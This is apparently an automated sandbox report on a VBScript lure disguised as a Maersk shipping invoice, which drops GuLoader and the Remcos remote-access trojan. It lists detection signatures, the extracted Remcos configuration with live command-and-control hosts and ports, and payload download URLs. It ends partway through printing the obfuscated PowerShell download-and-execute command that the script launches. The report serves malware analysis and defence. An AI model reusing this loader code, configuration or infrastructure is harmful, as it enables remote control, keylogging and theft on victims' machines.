Windows Analysis Report
Maersk_BL_Invoice_Packinglist.vbs

Overview

General Information

Sample name:	Maersk_BL_Invoice_Packinglist.vbs
Analysis ID:	1465860
MD5:	43fe0e9069047cb153a3e86508d5a6ca
SHA1:	bb5431130b0b3441b9eda1e54bad3f56eb49f04c
SHA256:	bcd66ce1c9d8d1123249ef8240a6e7ef32662aaa897845e866627ee69b28dff1
Tags:	GuLoaderMaerskRATRemcosRATvbs
Infos:

Detection

GuLoader, Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

VBScript performs obfuscated calls to suspicious functions

Yara detected GuLoader

Yara detected Powershell download and execute

Yara detected Remcos RAT

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Connects to many ports of the same IP (likely port scanning)

Found suspicious powershell code related to unpacking or dynamic code loading

Installs a global keyboard hook

Obfuscated command line found

Potential malicious VBS script found (suspicious strings)

Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)

Sample has a suspicious name (potential lure to open the executable)

Sigma detected: WScript or CScript Dropper

Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes

Suspicious execution chain found

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Uses dynamic DNS services

Very long command line found

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sleep loop found (likely to delay execution)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Signatures

AV Detection

Antivirus detection for URL or domain

Source: janbours92harbu02.duckdns.org

Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": "janbours92harbu02.duckdns.org:3980:0janbours92harbu02.duckdns.org:3981:1janbours92harbu03.duckdns.org:3980:0", "Assigned name": "XXL", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jmoughoe-DMPW3B", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "kpburtts.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for domain / URL

Source: janbours92harbu02.duckdns.org	Virustotal: Detection: 10%	Perma Link
Source: janbours92harbu03.duckdns.org	Virustotal: Detection: 7%	Perma Link
Source: janbours92harbu02.duckdns.org	Virustotal: Detection: 10%	Perma Link
Source: http://103.195.237.43/Outgassed.emz	Virustotal: Detection: 13%	Perma Link
Source: https://contemega.com.do/Outgassed.emz	Virustotal: Detection: 6%	Perma Link
Source: http://103.195.237.43	Virustotal: Detection: 11%	Perma Link
Source: http://103.195.237.43/QJqDH201.bin	Virustotal: Detection: 13%	Perma Link

Multi AV Scanner detection for submitted file

Source: Maersk_BL_Invoice_Packinglist.vbs	Virustotal: Detection: 12%			Perma Link
Source: Maersk_BL_Invoice_Packinglist.vbs	ReversingLabs: Detection: 13%

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 6444, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: unknown

HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.4:49731 version: TLS 1.2

Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000004.00000002.2304588851.00000000070F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bqm.Core.pdb source: powershell.exe, 00000004.00000002.2304588851.00000000070F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdbC source: powershell.exe, 00000004.00000002.2304588851.00000000070F0000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.4:49740 -> 206.123.148.198:3980
Source: Traffic	Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.4:49742 -> 206.123.148.198:3980

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: janbours92harbu02.duckdns.org

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 206.123.148.198 ports 3980,3981,0,3,8,9

Uses dynamic DNS services

Source: unknown	DNS query: name: janbours92harbu03.duckdns.org
Source: unknown	DNS query: name: janbours92harbu02.duckdns.org

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49740 -> 206.123.148.198:3980

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 103.195.237.43 103.195.237.43

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: M247GB M247GB

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /Outgassed.emz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /QJqDH201.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.195.237.43Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43

Source: global traffic	HTTP traffic detected: GET /Outgassed.emz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /QJqDH201.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.195.237.43Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: contemega.com.do
Source: global traffic	DNS traffic detected: DNS query: janbours92harbu02.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: janbours92harbu03.duckdns.org

Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.1
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.19
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.2
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.23
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.4
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/
Source: wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/;
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/O
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Ou
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Out
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outg
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outga
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgas
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgass
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgasse
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgassed
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgassed.
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgassed.e
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgassed.em
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2299590839.0000000004787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgassed.emz
Source: powershell.exe, 00000001.00000002.2386862644.00000170242A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2386862644.0000017022C25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgassed.emzX
Source: wab.exe, 0000000A.00000002.2974055601.0000000021870000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/QJqDH201.bin
Source: wab.exe, 0000000A.00000002.2974055601.0000000021870000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/QJqDH201.binEyessVescontemega.com.do/QJqDH201.bin
Source: wab.exe, 0000000A.00000002.2961771384.0000000005F38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/QJqDH201.binTq
Source: wab.exe, 0000000A.00000002.2961771384.0000000005F38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/QJqDH201.binV
Source: powershell.exe, 00000001.00000002.2386862644.00000170247CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://contemega.com.do
Source: wscript.exe, 00000000.00000003.1656474620.000001816A47F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1681014882.000001816851B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679774985.000001816850E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680311691.000001816851B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657183676.000001816A480000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1656928856.000001816A47F000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1680127852.0000018168534000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679774985.000001816850E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1681044219.0000018168535000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabP=
Source: wscript.exe, 00000000.00000002.1681014882.000001816851B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679774985.000001816850E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680311691.000001816851B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDu
Source: wscript.exe, 00000000.00000003.1657121988.0000018168591000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657029537.0000018168569000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?67126171c7
Source: powershell.exe, 00000001.00000002.2481281446.0000017032A72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2301952677.000000000569A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2299590839.0000000004787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2386862644.0000017022A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2299590839.0000000004631000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2299590839.0000000004787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2386862644.0000017022A01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2299590839.0000000004631000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.2386862644.00000170247CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.P
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.c
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.co
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.d
Source: powershell.exe, 00000001.00000002.2386862644.00000170242A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2386862644.0000017022C25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/O
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Ou
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Out
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outg
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outga
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgas
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgass
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgasse
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgassed
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgassed.
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgassed.e
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgassed.em
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2299590839.0000000004787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgassed.emz
Source: powershell.exe, 00000004.00000002.2301952677.000000000569A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2301952677.000000000569A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2301952677.000000000569A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.2299590839.0000000004787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.2481281446.0000017032A72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2301952677.000000000569A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443

Source: unknown

HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.4:49731 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe

Jump to behavior

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 6444, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_6540.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4412, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6540, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Potential malicious VBS script found (suspicious strings)

Source:

Initial file: Call Monaxial.ShellExecute("P" & Piskefldens, Guidernes96, "", "", Preconsultor187)

Sample has a suspicious name (potential lure to open the executable)

Source: Maersk_BL_Invoice_Packinglist.vbs

Static file information: Suspicious name

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 4117
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 4117
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 4117	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 4117	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt 